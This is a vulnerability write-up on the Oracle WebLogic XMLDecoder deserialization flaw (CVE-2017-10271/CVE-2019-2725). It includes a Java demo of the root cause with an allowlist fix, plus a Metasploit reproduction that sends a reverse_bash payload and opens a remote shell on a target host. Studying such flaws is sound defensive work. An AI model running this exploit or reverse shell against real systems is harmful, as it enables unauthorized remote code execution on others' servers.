The WLS Security component of Oracle WebLogic Server exposes a web service (wls-wsat) that parses client-supplied XML with java.beans.XMLDecoder. XMLDecoder is not a plain data deserializer: the document itself names the classes to instantiate and the methods to invoke, so an unauthenticated request can construct a java.lang.ProcessBuilder and run arbitrary commands with the privileges of the WebLogic process (CVE-2017-10271). The reproduction below uses the Metasploit module for the /_async/AsyncResponseService endpoint, i.e. CVE-2019-2725, the 2019 bypass of the fixes for this flaw that reaches the same XMLDecoder sink through the async web service; the references cover both issues.
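The following is an added example, not code from this page, from Oracle, or from the referenced exploits. It shows the root cause in isolation: XMLDecoder treats the document as a script of constructor and method calls, so parsing untrusted XML is code execution. The sample documents, the property name xmldecoder.demo and the allowlist in validate() are constructed for this demonstration; the allowlist illustrates the approach (restrict to data-only elements and attributes, rather than deny-listing element names as the 2017 fix did) and is not the actual WebLogic patch. To keep the demo observable in-process, the payload calls the static java.lang.System.setProperty through the same <void class="..." method="..."> construct the WLS payloads use to build a java.lang.ProcessBuilder.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.util.Map;
import java.util.Set;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class XmlDecoderDemo {

    // Constructed document in the XMLDecoder grammar the WLS payloads use. The real
    // payloads name java.lang.ProcessBuilder in the class attribute and call start();
    // here the same mechanism invokes the static System.setProperty instead, so the
    // side effect is visible without spawning a process. The <object> element returns
    // the property back to the caller. (Property name "xmldecoder.demo" is invented.)
    static final String MALICIOUS =
        "<java version=\"1.8.0\">\n" +
        "  <void class=\"java.lang.System\" method=\"setProperty\">\n" +
        "    <string>xmldecoder.demo</string>\n" +
        "    <string>method call executed while parsing</string>\n" +
        "  </void>\n" +
        "  <object class=\"java.lang.System\" method=\"getProperty\">\n" +
        "    <string>xmldecoder.demo</string>\n" +
        "  </object>\n" +
        "</java>";

    // Constructed document that carries only data.
    static final String BENIGN =
        "<java version=\"1.8.0\">\n" +
        "  <string>plain data</string>\n" +
        "</java>";

    // The vulnerable pattern: untrusted XML goes straight into XMLDecoder, which
    // loads the classes named in the document and invokes the named methods.
    static Object vulnerableDecode(String xml) {
        try (XMLDecoder d = new XMLDecoder(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)))) {
            return d.readObject();
        }
    }

    // Illustrative allowlist (an assumption for this example, not Oracle's patch):
    // only elements that carry plain values, and only attributes that cannot name
    // a class or a method.
    static final Map<String, Set<String>> ALLOWED = Map.of(
        "java",   Set.of("version"),
        "string", Set.of(),
        "int",    Set.of(),
        "void",   Set.of("index"),           // <void index="n"> fills an array slot
        "array",  Set.of("class", "length")  // class value restricted to "byte" below
    );

    static void validate(String xml) throws XMLStreamException {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);                      // no DTD / XXE
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        XMLStreamReader r = f.createXMLStreamReader(new StringReader(xml));
        while (r.hasNext()) {
            if (r.next() != XMLStreamConstants.START_ELEMENT) continue;
            String el = r.getLocalName();
            Set<String> okAttrs = ALLOWED.get(el);
            if (okAttrs == null) throw new XMLStreamException("disallowed element <" + el + ">");
            for (int i = 0; i < r.getAttributeCount(); i++) {
                String attr = r.getAttributeLocalName(i), val = r.getAttributeValue(i);
                if (!okAttrs.contains(attr))
                    throw new XMLStreamException("disallowed attribute " + attr + " on <" + el + ">");
                if (el.equals("array") && attr.equals("class") && !val.equals("byte"))
                    throw new XMLStreamException("only byte arrays are accepted");
            }
        }
    }

    // Hardened form: reject anything outside the allowlist before XMLDecoder runs.
    static Object safeDecode(String xml) throws XMLStreamException {
        validate(xml);
        return vulnerableDecode(xml);
    }

    public static void main(String[] args) {
        // 1. Vulnerable path: parsing alone calls System.setProperty; readObject()
        //    hands back the value produced by the <object> element.
        Object leaked = vulnerableDecode(MALICIOUS);
        System.out.println("vulnerable: readObject() returned \"" + leaked + "\"");
        System.out.println("vulnerable: property now = " + System.getProperty("xmldecoder.demo"));

        // 2. Hardened path accepts data and refuses the payload before any class is loaded.
        System.clearProperty("xmldecoder.demo");
        try {
            System.out.println("hardened: benign document -> \"" + safeDecode(BENIGN) + "\"");
            safeDecode(MALICIOUS);
            System.out.println("hardened: payload was accepted (should not happen)");
        } catch (XMLStreamException e) {
            System.out.println("hardened: rejected payload: " + e.getMessage());
            System.out.println("hardened: property now = " + System.getProperty("xmldecoder.demo"));
        }
    }
}
```

Run with `javac XmlDecoderDemo.java && java XmlDecoderDemo` (Java 9 or later for Map.of). The first two lines of output show the property being set purely by parsing; the hardened path prints the benign value, then rejects the payload on the class attribute of <void> and reports the property as null. The design point is that the only robust fix is to never hand attacker-controlled XML to XMLDecoder at all; if a pre-filter is unavoidable, it must be an allowlist of elements and attributes, since any element that can carry a class or method name (object, void, new, class) is a code-execution primitive.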
References:
https://www.exploit-db.com/exploits/43458/
https://paper.seebug.org/487/
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md
http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
Reproduction:
msf5 > search weblogic_deserialize_asyncresponseservice

Matching Modules
================

   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/misc/weblogic_deserialize_asyncresponseservice  2019-04-23       excellent  Yes    Oracle Weblogic Server Deserialization RCE - AsyncResponseService

msf5 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options

Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7001                          yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
   VHOST                                    no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix

msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.3.5
rhosts => 192.168.3.5
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.0.14
lhost => 192.168.0.14
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit

[*] Started reverse TCP handler on 192.168.0.14:4444
[*] Generating payload...
[*] Sending payload...
[*] Command shell session 1 opened (192.168.0.14:4444 -> 192.168.3.5:56352) at 2020-03-09 09:03:21 +0800

ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:19:00:02
          inet addr:172.25.0.2  Bcast:172.25.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:368 errors:0 dropped:0 overruns:0 frame:0
          TX packets:315 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:53275 (53.2 KB)  TX bytes:157223 (157.2 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:12 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:628 (628.0 B)  TX bytes:628 (628.0 B)
Other material:
https://cvedetails.com/cve/CVE-2017-10271/
CNVD-C-2019-48814
http://www.cnvd.org.cn/webinfo/show/4999
https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
https://twitter.com/F5Labs/status/1120822404568244224